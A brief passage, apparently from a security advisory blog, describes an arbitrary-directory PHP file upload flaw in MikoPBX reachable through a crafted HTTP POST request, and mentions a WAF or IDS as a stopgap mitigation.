By sending a specially crafted HTTP POST request with a malicious PHP <a href=\"https:\/\/www.ameeba.com\/blog\/cve-2025-32977-unauthenticated-backup-file-upload-vulnerability-in-quest-kace-systems-management-appliance\/\"  data-wpil-monitor-id=\"64423\">script<\/a>, an attacker can upload this script to an arbitrary directory within the MikoPBX system. If that is not immediately feasible, using a Web Application Firewall (WAF) or Intrusion Detection System (IDS) can serve as a temporary mitigation method.
